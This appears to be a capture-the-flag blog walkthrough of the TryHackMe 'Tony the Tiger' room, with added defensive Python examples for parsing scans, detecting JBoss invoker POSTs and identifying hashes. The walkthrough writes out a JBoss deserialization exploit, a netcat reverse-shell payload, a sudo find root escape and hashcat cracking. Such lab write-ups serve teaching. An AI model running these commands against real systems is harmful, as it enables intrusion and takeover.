CatSec.org

Tony the Tiger

In this post, we will look into the room "Tony the Tiger" from TryHackMe, which can be found on https://tryhackme.com

This is an exploit of a Java deserialization vulnerability in JBoss, CVE-2015-7501, which allows remote code execution when the server deserializes an attacker-supplied serialized object.

So what we'll do is use it to run a netcat reverse shell on the host to gain access, and then root the box.

Task 1 Deploy

Deploy the machine

Task 2 Intro

All answers are in the introduction paragraph kindly written by the author of the room; figure them out!

Task 3 Recon

We can run nmap against the host to check for open ports (default scripts, version detection, normal-format output to a file):

nmap -sC -sV -oN nmap {IP}

Notice that the question explicitly asks about port 8080, and in my case it took a little longer to initialize than the other open ports. Keep in mind that if it is reported closed, you may want to rerun the command.

PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.13 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   1024 d6:97:8c:b9:74:d0:f3:9e:fe:f3:a5:ea:f8:a9:b5:7a (DSA)
|   2048 33:a4:7b:91:38:58:50:30:89:2d:e4:57:bb:07:bb:2f (RSA)
|   256 21:01:8b:37:f5:1e:2b:c5:57:f1:b0:42:b7:32:ab:ea (ECDSA)
|_  256 f6:36:07:3c:3b:3d:71:30:c4:cd:2a:13:00:b5:25:ae (ED25519)
80/tcp   open  http    Apache httpd 2.4.7 ((Ubuntu))
|_http-generator: Hugo 0.66.0
|_http-server-header: Apache/2.4.7 (Ubuntu)
|_http-title: Tony's Blog
8080/tcp open  http    Apache Tomcat/Coyote JSP engine 1.1
| http-methods:
|_  Potentially risky methods: PUT DELETE TRACE
|_http-server-header: Apache-Coyote/1.1
|_http-title: Welcome to JBoss AS
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

There we have it: SSH is open and there are two HTTP servers running, one on port 80 and one on port 8080 (the JBoss instance, which also advertises the risky PUT, DELETE and TRACE methods).

To answer the questions, we have:

  • Service on 8080: Apache Tomcat/Coyote JSP engine 1.1
  • Name of front-end application on 8080: JBoss
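When you have more than one host to look at, it helps to turn the scan file from nmap -oN into structured data and flag the things a defender cares about (risky HTTP methods, an exposed JBoss management interface). The parser below is an added example, not part of the original post or of any nmap tooling; the SAMPLE_NMAP text is a constructed excerpt in the same normal-output layout as the scan above, and the finding rules are the author of this example's own choice.

```python
import re

# Constructed nmap -oN style excerpt (same layout as the scan above, not the page's own file).
SAMPLE_NMAP = """\
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.13 (Ubuntu Linux; protocol 2.0)
80/tcp   open  http    Apache httpd 2.4.7 ((Ubuntu))
|_http-title: Tony's Blog
8080/tcp open  http    Apache Tomcat/Coyote JSP engine 1.1
| http-methods:
|_  Potentially risky methods: PUT DELETE TRACE
|_http-server-header: Apache-Coyote/1.1
|_http-title: Welcome to JBoss AS
"""

# A port line: "8080/tcp open  http    Apache Tomcat/Coyote JSP engine 1.1"
PORT_RE = re.compile(
    r"^(?P<port>\d+)/(?P<proto>tcp|udp)\s+(?P<state>\S+)\s+(?P<service>\S+)\s*(?P<version>.*)$"
)
# A single-line NSE script result: "|_http-title: Welcome to JBoss AS"
SCRIPT_RE = re.compile(r"^\|_?\s*(?P<key>[\w-]+):\s*(?P<value>.*)$")


def parse_nmap(text):
    """Parse normal-format nmap output into a list of port dicts with attached script results."""
    ports = []
    current = None
    for line in text.splitlines():
        m = PORT_RE.match(line)
        if m:
            current = m.groupdict()
            current["port"] = int(current["port"])
            current["scripts"] = {}
            ports.append(current)
            continue
        if current is None:
            continue  # header lines before the first port
        m = SCRIPT_RE.match(line)
        if m:
            current["scripts"][m["key"]] = m["value"].strip()
        elif "Potentially risky methods:" in line:
            # http-methods prints this as an indented continuation line
            current["scripts"]["risky-methods"] = line.split(":", 1)[1].split()
    return ports


def findings(ports):
    """Return (port, message) pairs for exposures worth a ticket."""
    out = []
    for p in ports:
        if p["state"] != "open":
            continue
        risky = p["scripts"].get("risky-methods", [])
        if risky:
            out.append((p["port"], "risky HTTP methods enabled: " + " ".join(risky)))
        title = p["scripts"].get("http-title", "")
        if "JBoss" in title or "JBoss" in p["version"]:
            out.append((p["port"], "JBoss AS reachable; verify invoker/JMX access controls"))
    return out


if __name__ == "__main__":
    for port, msg in findings(parse_nmap(SAMPLE_NMAP)):
        print(f"{port}: {msg}")
```

Run it over a real scan with `findings(parse_nmap(open("nmap").read()))`; the "nmap" filename is the one the command above writes with -oN.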

Task 4 Tony’s Flag

It took me quite some time to figure out what to do to get this flag, since I'm quite new to cybersecurity and all, but hear this: we have to analyse the images.

See the Tony the Tiger image on a blue background? Download it.

The first thing you read about on the steganography topic is to run strings on the file:

strings tony.jpg

There it is!!

Task 5 Exploit!

The room author kindly provides the Python script for exploiting the vulnerability; let's take a look.

Basically, the script sends a POST request whose body is a serialized Java object that triggers the deserialization vulnerability and executes our Linux command.

gadget = check_output(['java', '-jar', ysoserial_path, 'CommonsCollections5', args.command])

This uses the ysoserial .jar to build the serialized payload (the CommonsCollections5 gadget chain) that carries our command.

Then the script POSTs the payload to the JMXInvokerServlet:

r = requests.post('{}://{}:{}/invoker/JMXInvokerServlet'.format(args.proto, ip, port), verify=False, data=gadget)
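From the defender's side, the request above leaves an obvious trace: a POST to /invoker/JMXInvokerServlet in the JBoss/Tomcat access log, typically from a scripting user agent. The following detection is an added example, not part of the original post or of the exploit script; the log lines are constructed in Apache/Tomcat combined format, and the endpoint prefixes and method list are this example's own choices.

```python
import re
from collections import Counter

# Constructed access-log lines in combined format (not from the room's machine).
SAMPLE_LOG = """\
10.0.0.5 - - [10/Mar/2021:12:00:01 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.0.0.9 - - [10/Mar/2021:12:00:07 +0000] "POST /invoker/JMXInvokerServlet HTTP/1.1" 200 1337 "-" "python-requests/2.25.1"
10.0.0.9 - - [10/Mar/2021:12:00:08 +0000] "POST /invoker/JMXInvokerServlet HTTP/1.1" 200 1337 "-" "python-requests/2.25.1"
10.0.0.5 - - [10/Mar/2021:12:00:09 +0000] "GET /jmx-console/ HTTP/1.1" 403 221 "-" "Mozilla/5.0"
10.0.0.7 - - [10/Mar/2021:12:00:12 +0000] "PUT /upload/x.jsp HTTP/1.1" 201 0 "-" "curl/7.68.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# Management/invoker endpoints that should not be reachable from untrusted networks.
SENSITIVE_PREFIXES = ("/invoker/", "/jmx-console", "/web-console", "/admin-console")
# Methods the scan above reported as "potentially risky".
RISKY_METHODS = {"PUT", "DELETE", "TRACE"}


def parse_line(line):
    """Parse one combined-format line into a dict, or None if it does not match."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def classify(entry):
    """Return a list of alert tags for one parsed access-log entry."""
    tags = []
    path = entry["path"].lower()
    if entry["method"] == "POST" and path.startswith("/invoker/"):
        tags.append("jboss_invoker_post")  # the pattern the exploit above produces
    elif path.startswith(SENSITIVE_PREFIXES):
        tags.append("management_endpoint_access")
    if entry["method"] in RISKY_METHODS:
        tags.append("risky_http_method")
    return tags


def scan(log_text):
    """Return (alerts, per-source count of invoker POSTs) for a block of log text."""
    alerts = []
    invoker_posts = Counter()
    for line in log_text.splitlines():
        entry = parse_line(line)
        if entry is None:
            continue
        tags = classify(entry)
        if tags:
            alerts.append((entry["ip"], entry["method"], entry["path"], tags))
        if "jboss_invoker_post" in tags:
            invoker_posts[entry["ip"]] += 1
    return alerts, invoker_posts


if __name__ == "__main__":
    alerts, counts = scan(SAMPLE_LOG)
    for ip, method, path, tags in alerts:
        print(f"{ip} {method} {path} -> {', '.join(tags)}")
    print("invoker POSTs per source:", dict(counts))
```

The per-source counter is there because a single POST to the invoker can be a scanner; several in a row with a 200 response are what you would escalate. The lasting fix is the one the vendor patch and hardening guides describe: restrict or remove the invoker and console applications rather than rely on the log.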

Reverse Shell

Now we can get a reverse shell on this machine to gain access.

In one terminal, start a listener:

nc -lvnp 8888

In another terminal, run the exploit with the netcat command as the payload:

python exploit.py --ysoserial-path ysoserial.jar --proto http {IP}:8080 "nc {Self_IP} -e /bin/sh 8888"

Our first terminal now has a shell on the host. For stability, spawn a TTY by running:

python -c 'import pty; pty.spawn("/bin/bash")'

Task 6 Find User JBoss' flag

Now that we have access, check which user we are by running whoami.

As you can see, we are not JBoss.

Navigate to /home/jboss and run ls -la to check for files.

cat note

Here we can chill and read the discussion between the two users, which includes a new password for the jboss user.

Log in over SSH as jboss with that password:

ssh jboss@{IP}

Navigate to /home/jboss and ls -la again.

cat the .jboss file to read the flag.

Task 7 Escalation!

We can always enumerate using LinEnum or LinPEAS, but I always enjoy misconfigurations on SUID, so let's run

sudo -l

As we can see, the jboss user is allowed to run /usr/bin/find as root; maybe we can figure out a way to escape to a shell from this command.

A first-page search for "linux escape to shell find" got me here.

We can now run the escape to shell using the find command:

sudo find /etc/passwd -exec /bin/sh \;

Let's cat /root/root.txt

and we get a flag…

but it’s clearly not the answer expected on THM.

It's also not a known hash format (the hashid command does not identify it):

hashid {HASH}

Since I have a little experience with access tokens for system authentication, I noticed the "==" characters at the end of our flag and I thought, well, maybe this is Base64 encoded.

So I went here, decoded it, and guess what: hashid now identifies it as a simple MD5.
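The "peel the encoding, then look at what is left" step is worth automating, because a hex digest that has been Base64-wrapped once or twice fools length-based identifiers until it is unwrapped. The script below is an added example, not part of the original post or of hashid; the sample token is constructed in the code (an MD5 of a made-up string, then Base64-encoded), and the length-to-algorithm table and the three-layer limit are this example's own assumptions.

```python
import base64
import binascii
import hashlib
import re

# Unsalted digest formats by hex length (constructed table; hashid knows many more).
HEX_LENGTHS = {32: "MD5 (or MD4/NTLM)", 40: "SHA-1", 64: "SHA-256", 128: "SHA-512"}
HEX_RE = re.compile(r"^[0-9a-fA-F]+$")

# Constructed sample: an MD5 digest wrapped once in Base64, like the flag on the page.
SAMPLE_MD5 = hashlib.md5(b"constructed-sample").hexdigest()
SAMPLE_TOKEN = base64.b64encode(SAMPLE_MD5.encode()).decode()


def identify_hex_digest(s):
    """Name the digest family if s is a hex string of a known digest length, else None."""
    if HEX_RE.match(s):
        return HEX_LENGTHS.get(len(s))
    return None


def try_base64(s):
    """Return the decoded text if s is strict Base64 whose payload is printable ASCII, else None."""
    try:
        raw = base64.b64decode(s, validate=True)
    except (binascii.Error, ValueError):
        return None
    try:
        text = raw.decode("ascii")
    except UnicodeDecodeError:
        return None
    return text if text.isprintable() else None


def unwrap_and_identify(token, max_layers=3):
    """Peel Base64 layers until a recognizable hex digest (or nothing) remains."""
    current = token.strip()
    for layer in range(max_layers + 1):
        kind = identify_hex_digest(current)
        if kind:
            return {"layers": layer, "digest": current.lower(), "kind": kind}
        decoded = try_base64(current)
        if decoded is None:
            break  # not Base64 (or not text underneath): stop peeling
        current = decoded
    return None


if __name__ == "__main__":
    print(unwrap_and_identify(SAMPLE_TOKEN))
    print(unwrap_and_identify("not-a-hash!"))
```

The strict decode (validate=True) and the printable-ASCII check are what keep the loop from "decoding" arbitrary hex into garbage and then misidentifying the garbage; a real flag, like the one above, decodes to exactly 32 hex characters after one layer.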

We can easily crack it with rockyou.txt now:

hashcat -a 0 -m 0 {HASH} /usr/share/wordlists/rockyou.txt

and there we have it.